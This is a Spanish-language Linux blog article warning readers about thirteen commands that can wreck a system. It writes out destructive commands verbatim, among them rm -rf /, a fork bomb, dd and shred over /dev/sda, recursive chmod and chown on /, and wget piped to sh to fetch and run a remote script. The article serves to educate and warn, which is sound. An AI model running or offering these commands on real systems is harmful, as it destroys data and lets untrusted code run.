13 comandos linux que pueden destruir tu sistema

13 comandos linux que pueden destruir tu sistema, sin remedio alguno.

Los comandos linux que operan en la shell de Linux son muy poderosos, con solo un clic en la tecla enter… puedes bloquear el sistema, eliminar directorios imprescindibles, borrar archivos o incluso la carpeta raíz. Nuestro sistema ha sido destruido.

En algunos casos, Linux ni siquiera nos pide confirmación, tiene la capacidad de ejecutar el comando de inmediato. No será ni el primero, ni el último que destruye un sistema por no ser consciente de lo que estaba ejecutando. Algún día contaré la historia de un supuesto sysadmin, que acabó con los historiales (miles de pacientes) de un hospital privado en España, jajaj.

Ha llegado a mis oídos, que últimamente muchos lamers responden en foros o chats contenidos de supuesta ayuda, que más que ayudar, fastidian tu sistema. Parece motivo de risa, pero no lo es. No confíes en foros extraños y… muchos menos en sitios web con poca o ninguna reputación.13 comandos linux peligrosos

13 comandos linux peligrosos

13 comandos linux que pueden destruir tu sistema

El siguiente listado de comandos son perfectamente útiles bajo entornos específicos, pero nada recomendados en sistemas estables y, aún menos si no dispones de suficientes conocimientos. No juegues con tu sistema, yo no soy el responsable de los posibles daños causados.

Formatear el sistema

El administrador de Linux usa este comando constantemente, cuando es necesario formatear o asignar un sistema de archivos a una partición. Si lo utilizas de forma errónea, también puedes formatear un disco con datos importantes. Por ejemplo.

mkfs.ext4 /dev/sda

Antes de ejecutar el anterior comando, asegúrate que seleccionaste el dispositivo o partición deseado.

 

Eliminar /etc y /boot

El directorio /etc, contiene los archivos de configuración del sistema. El directorio /boot, contiene archivos necesarios para el inicio del sistema, relacionados con el kernel, InitRD y GRUB. Jamás ejecutes los siguientes comandos.

rm -rf /etc

rm -rf /boot

Otra forma de destruir el sistema, es borrar los archivos de configuración. No lo hagas.

find / -iname "*.conf" -exec rm -rf {} \;

 

Eliminar el sistema de archivos

Esto elimina todo el sistema de archivos de tu servidor o desktop, cada byte de datos será borrado del disco. Ya sabes a lo que te expones al ejecutarlo.

rm -rf /

 

Bomba Fork
Fork Bomb 13 comandos linux

Fork Bomb – 13 comandos linux

Este comando crea un sinfín de copias sobre sí mismo, hasta agotar los recursos del sistema provocando un bloqueo total de forma irremediable.

:(){ :|:& };:

En este artículo anterior, puedes aprender más sobre las bombas fork.

13 comandos linux que pueden destruir tu sistema

 

Llenar el disco de datos aleatorios

Estos comandos son útiles si quieres deshacerte de un disco y, que nadie pueda recuperar los datos. Si lo ejecutas en un disco por error, no podrás recuperar los datos contenidos.

dd if=/dev/urandom of=/dev/sda

Otra opción que sobrescribe el disco varias veces.

shred /dev/sda

 

Desbarajuste en permisos de archivo

Todos los comandos mencionados anteriormente, eliminan o destruyen datos. Está claro que en el artículo 13 comandos linux que pueden destruir tu sistema, debemos abordar otras opciones.

Los permisos de archivos en linux, son fundamentales para un correcto funcionamiento del sistema. Al ejecutar comandos erroneos sobre los permisos, puedes provocar un auténtico desbarajuste o caos sobre ellos, de forma que el sistema sea difícil de recuperar. Vemos algunos ejemplos.

El primer comando borra todos los permisos de los archivos y carpetas del sistema. El acceso resultará imposible.

chmod -Rv 000 /

Otro comando que logra el mismo objetivo que el anterior.

chown -R nobody:nobody /

Un comando opuesto a los anteriores, concederá permisos a todos y a todo. El riesgo es altísimo. Recuerdo con gracia, un usuario que tenía un VPS con varias web y, como tenía problemas con los permisos, ejecuto este comando. En pocas horas, decenas de intrusos le trastocaban el sistema, jajjaja.

chmod -R 777 /

 

Black Hole

El Black Hole, también conocido como agujero negro, nos indica que los datos han sido copiados o movidos correctamente, pero en realidad fueron descartados. Por ejemplo.

mv carpeta/dev/null

Algo similar…

Dev/null

 

El peligro de wget
El peligro de Wget 13 comandos linux

El peligro de Wget 13 comandos linux

Como punto final del artículo «13 comandos linux que pueden destruir tu sistema»,  vemos el comando wget.

Tal vez no seas consciente del peligro de este comando, tan utilizado por todos los usuarios de linux. El peligro de Wget no radica en el propio comando, sino en el usuario malintencionado que ofrece el enlace a un script de shell con auto-ejecución incluida. Este script puede contener código malicioso y, desconocemos sus posibles efectos.

El formato del comando es similar a lo siguiente.

wget https://sitioweb.com/script.sh -O- | sh

No ejecutes este tipo de comandos, a no ser que provengan de sitios o usuarios confiables.

 

Canales de Telegram: Canal SoloLinux – Canal SoloWordpress

Espero que este artículo te sea de utilidad, puedes ayudarnos a mantener el servidor con una donación (paypal), o también colaborar con el simple gesto de compartir nuestros artículos en tu sitio web, blog, foro o redes sociales. 13 comandos linux que pueden destruir tu sistema.

Chat de SoloLinux en Telegram

 

Agregar comentario

1 logo sololinux

Suscríbete a SoloLinux

Recibe todos los nuevos artículos es tu correo electrónico

You have Successfully Subscribed!

Ir al contenido